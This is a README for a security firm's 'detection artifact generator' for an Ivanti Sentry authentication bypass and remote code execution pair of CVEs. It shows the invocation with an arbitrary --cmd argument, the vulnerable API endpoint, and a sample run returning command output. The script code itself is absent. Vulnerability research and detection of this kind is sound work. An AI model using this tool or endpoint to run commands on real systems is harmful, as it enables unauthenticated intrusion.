Share
## https://sploitus.com/exploit?id=69FCF5C6-DEC9-5C41-B8BE-6AA97872F5D7
# CVE-2026-10520 and CVE-2026-10523
An Ivanti Sentry Authentication Bypass and Remote Code Execution Detection Artifact Generator.
See our [blog post](https://labs.watchtowr.com/) for technical details.
# Detection in Action
```
$ python3 watchTowr-vs-Ivanti-Sentry-RCE-CVE-2026-10520-CVE-2026-10523.py --url https://127.0.0.1 --cmd "uname -a"
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-Ivanti-Sentry-RCE-CVE-2026-10520-CVE-2026-10523.py
(*) Ivanti Sentry Authentication Bypass and Remote Code Execution Detection Artifact Generator Tool
- Sonny , watchTowr (sonny@watchTowr.com)
CVEs: [CVE-2026-10520, CVE-2026-10523]
============================================================
Target: https://127.0.0.1
Command: uname -a
[+] Sending command execution check to: https://127.0.0.1/mics/api/v2/sentry/mics-config/handleMessage
[+] Target appears to be vulnerable.
Command output:
Linux 127.0.0.1 4.18.0-553.84.1.el8_10.x86_64 #1 SMP Mon Nov 17 12:53:24 PST 2025 x86_64 x86_64 x86_64 GNU/Linux
```
# Usage
```
python3 watchTowr-vs-Ivanti-Sentry-RCE-CVE-2026-10520-CVE-2026-10523.py --url https://127.0.0.1 --cmd "uname -a"
```
# Description
This watchTowr Detection Artefact Generator checks for the Ivanti Sentry authentication bypass and remote code execution vulnerabilities CVE-2026-10520, CVE-2026-10523.
Remediation and further details be found within the Ivanti advisory: https://hub.ivanti.com/s/article/Security-Advisory-Ivanti-Sentry-CVE-2026-10520-CVE-2026-10523
# Follow [watchTowr](https://watchTowr.com) Labs
For the latest security research follow the [watchTowr](https://watchTowr.com) Labs Team.
- https://labs.watchtowr.com/
- https://x.com/watchtowrcyber